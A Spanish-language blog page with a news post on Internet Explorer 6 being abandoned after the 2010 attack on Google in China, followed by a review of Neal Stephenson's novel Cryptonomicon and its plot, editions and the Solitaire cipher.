En el 2001 fue el lanzamiento oficial de este navegador que pronto se volvería en uno de los más populares, siendo utilizado en la mayoría de ordenadores del mundo con conexión a Internet. 9 años más tarde, las faltas de medidas de seguridad informática, la proliferación de nuevos navegadores más eficaces y el deseo de cientos de sitios web a que se utilicen ordenadores actualizados ha llevado a que se marque el fin de Internet Explorer 6.

La primera compañía en darle la espalda a este navegador fue Google, que luego de que haya recibido un ataque informático en China a causa de un grupo de hackers que aprovecharon una debilidad del navegador para atacar a aquellos defensores de los derechos humanos de ese país. Desde el 1 de marzo, ya no se podrá utilizar servicios del buscador web desde Internet Explorer como el popular sistema de edición de documentos Google Docs. El mayor sitio web de video online, Youtube también dejara de ser usado desde IE 6 a partir del 13 de marzo.

Debido a que el ataque informático en China fue un asunto que atrajo la atención del mundo, viendo hasta el mismo Barack Obama pidiendo explicaciones por lo sucedido, los gobiernos de Alemania y Francia también desalentaron a los cibernautas de sus respectivos países a que utilicen IE 6. Incluso los mismos responsables del navegador han aconsejado a los usuarios a que no utilicen más Internet Explorer 6.

Luego del ataque informático de autoridades chinas a Google, se adelantó el lanzamiento de un parche de seguridad que resolvía la vulnerabilidad que permitió que el ciberataque se llevara a cabo, sin embargo los representantes de Internet Explorer aconsejaron a los usuarios que era mejor dejar de usar la versión 6 por una más actualizada como la 8 que posee más y mejores mecanismos de seguridad como los filtros Anti-phishing y Smartscreen.

Como una forma de conmemorar este hecho una empresa de diseño, la Aten Design Group, ha decidido llevar a cabo un funeral en Denver, Estados Unidos. La invitación lee que: “Internet Explorer Seis, residente de las redes por más de ocho años, murió la mañana del 1 de marzo de 2010 en Mountain View, California, como el resultado de un accidente laboral ocurrido en las oficinas centrales de Google. El programa, mejor conocido como IE6 por sus cercanos, es sucedido por su hijo Internet Explorer 7 y su nieta Internet Explorer

domingo, 3 de enero de 2010

Un regalo de reyes: Neal Stephenson - El codigo enigma o criptonomicon


Criptonomicón


Criptonomicón es una novela escrita por Neal Stephenson más cercana a la ficción histórica y a las novelas de acción tecnológica contemporáneas que a la ciencia ficción que suele desarrollar este escritor. Se desarrolla en dos líneas temporales paralelas: la de los criptógrafos de la Segunda Guerra Mundial que intentan romper los códigos de comunicaciones del Eje Roma-Berlín-Tokio (ver U-413, U-553, U-691, Máquina Enigma, Alan Turing, Bletchley Park), y la de sus descendientes, que intentan utilizar la criptografía moderna para construir un paraíso de datos en un estado insular ficticio del Este asiático. En ambas historias tienen especial importancia las maquinaciones políticas que implican ambos esfuerzos.


El título proviene indirectamente del Necronomicón, una obra ficticia mencionada en las obras del escritor H. P. Lovecraft, aunque cuando Stephenson eligió el título no conocía el origen de la palabra, sino que fue inspirada por la aparición del Necronomicón en la serie de comedias de horror de El ejército de las tinieblas (Evil Dead).
Algunas partes de Criptonomicón puede ser notablemente pesadas para lectores no técnicos, ya que emplea múltiples páginas en explicar detalladamente conceptos criptográficos e informáticos. A pesar de los detalles técnicos el libro tuvo la admiración de sus seguidores, críticos literarios y lectores.
La primera edición la llevó a cabo la editorial estadounidense Eos el 4 de mayo de 1999, bajo el título original Criptonomicón en un único volumen de 918 páginas. La editorial española Ediciones B se responsabilizó de la versión española de la colección Nova y Byblos, cuya traducción se presenta en tres volúmenes subtitulados El Código Enigma, de 455 páginas, El Código Pontifex de 494 páginas y El Código Aretusa de 496 páginas, cortando en las páginas 320 y 620 del original estadounidense. Idéntico criterio se aplicó en la edición francesa. En el año 2007 Ediciones B publicó una edición de lujo, tapa dura con sobrecubiertas, en un solo volumen de 864 páginas.


La obra ha sido galardonada con el premio Locus 2000 como Libro de culto de los Hackers. Según algunos críticos, el Criptonomicón de Stephenson es a la criptografía y al cyberpunk de la sociedad de la información lo que El Señor de los Anillos de JRR Tolkien a la magia y la fantasía.


El Criptonomicón, descrito como la «Biblia del criptógrafo» que aparece a lo largo de la novela, es un libro de ficción inventado por Neal Stephenson para la trama del Criptonomicón y no existe en la realidad.
Stephenson incluye, como parte del argumento, una precisa descripción de (y un script en Perl para) el cifrado Solitario (llamado Pontifex en el libro), un algoritmo criptográfico desarrollado por Bruce Schneier y que se ejecuta mediante una baraja de cartas.


El trasfondo infotecnológico de Criptonomicón es la criptografía y las matemáticas y el uso que se hacen de ellas en las dos tramas que se van compaginando a lo largo de la novela y que se centran en el marco histórico de la Segunda Guerra Mundial y en un presente paralelo al que vivimos actualmente. La principal aplicación que se da en la trama histórica será la ruptura de los códigos utilizados por los alemanes y japoneses sin que estos se den cuenta, mientras que en el presente se intenta crear la Cripta, un paraíso informático de datos libres del poder de los gobiernos.


En la trama que tiene transcurso durante la Segunda Guerra Mundial se nos presenta a Lawrence Pritchard Waterhouse, un ficticio genio matemático y criptoanalista especializado en descifrar códigos del enemigo. Junto a él tenemos a Bobby Shaftoe, un sargento de la infantería de marina estadounidense adicto a la morfina con amplia experiencia en el frente del Pacífico que acaba en la secreta compañía 2702 junto al misterioso teniente–sacerdote Enoch Root, una compañía dedicada a despistar al enemigo con el fin de que no sospechase que se habían roto sus códigos. Después de muchas anécdotas, Waterhouse acabara casándose con una qwghlmiana; Shaftoe volverá a Filipinas junto al general MacArthur, personaje real, y a su amigo japonés Goto Dengo, para fallecer en su última misión días después de conocer a su hijo; y Enoch Root de la Societas Eruditorum simulará su propia muerte y regresará a Filipinas en busca de una mina nipona.
A lo largo de esta trama aparecen varios personajes y sitios históricos relevantes, y componentes de ficción como el propio Criptonomicón, un libro de los aliados de la Segunda Guerra Mundial que se usaba como repositorio de información para descifrar los códigos del Eje; el Reino de Qwghlm, perteneciente al Reino Unido, o el sultanato de Kinakuta.


La segunda trama tiene lugar en un presente paralelo, en el cual sesenta años después Randy Waterhouse, nieto de Lawrence y experto hacker criptográfico deja el mundo informático californiano para embarcarse en un desafiante proyecto empresarial junto a sus compañeros de Epiphyte Corporation con la finalidad de la crear la Cripta, un paraíso fiscal y de la información, pero tendrá que enfrentarse a viejos enemigos como Andrew Loeb, a otros nuevos como "el Dentista" y a la maquinaria política de los gobiernos. Para ello contará con la ayuda de sus viejos amigos Avi, Eb, John, Tom y Beryl y con la del equipo de la Semper Marine Services, que componen Doug y Amy Shaftoe, hijo y nieta de Bobby. Para respaldar la moneda electrónica de la Cripta será necesario conseguir oro, y necesitarán la ayuda de la compañía de excavaciones GOTO de Goto Dengo, quien construyó el "Gólgota" japonés, donde se guardó todo el tesoro obtenido como botín de guerra japonés durante la segunda guerra mundial. Además, Avi tiene otra misión para la Cripta: alojar el PEPH, el Paquete de Educación y Prevención del Holocausto, con el fin de ofrecer a la humanidad el conocimiento suficiente para la supervivencia. De esta trama cabe destacar la reaparición de Enoch Root, quien ayuda y apoya a Randy en la tarea de descifrado del código Aretusa durante su periodo de encarcelamiento en Filipinas y le enseña el método de cifrado del Solitario, o Pontifex, comentado más arriba.



Realidad en el Criptonomicón



El Criptonomicón utiliza un marco real como escenario de su historia. Así aparecen personajes, lugares y objetos de notable importancia histórica (algunos toman parte activa de la trama y otros simplemente son nombrados). Aquí hay una lista:


Alan Turing
Douglas MacArthur
John Von Neumann
Isoroku Yamamoto
Winston Churchill
Theodore Roosevelt
Máquina de Turing
Máquina Enigma
Colossus
Bletchley Park
Linux (en éste caso el autor utiliza el sobrenombre Finux para referirse a él)
BeOS
Microsoft (y Windows)


Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)